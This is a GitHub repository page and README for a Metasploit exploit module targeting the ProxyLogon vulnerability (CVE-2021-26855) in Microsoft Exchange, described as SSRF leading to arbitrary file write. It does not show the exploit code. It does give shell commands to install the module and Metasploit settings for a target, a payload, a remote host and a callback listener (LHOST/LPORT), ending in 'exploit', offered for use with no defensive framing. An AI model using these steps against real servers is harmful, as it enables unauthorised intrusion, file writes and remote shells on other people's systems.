Skip to content

TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 

Repository files navigation

ProxyLogon-CVE-2021-26855-metasploit

CVE-2021-26855 proxyLogon exchange ssrf to arbitrary file write metasploit exploit script

preparation

git clone https://github.com/TaroballzChen/ProxyLogon-CVE-2021-26855-metasploit
cd ProxyLogon-CVE-2021-26855-metasploit
mkdir -p ~/.msf4/modules/exploits/windows/
cp exchange_ssrf_to_arbitrary_file_write.py ~/.msf4/modules/exploits/windows/
chmod +x ~/.msf4/modules/exploits/windows/exchange_ssrf_to_arbitrary_file_write.py
msfconsole

metasploit usage

set target <target>
set PAYLOAD <payload>
set rhost <vuln ip>
set port <vuln port>
set LHOST <list host ip>
set LPORT <list port>

exploit

exploit

About

CVE-2021-26855 proxyLogon metasploit exploit script

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages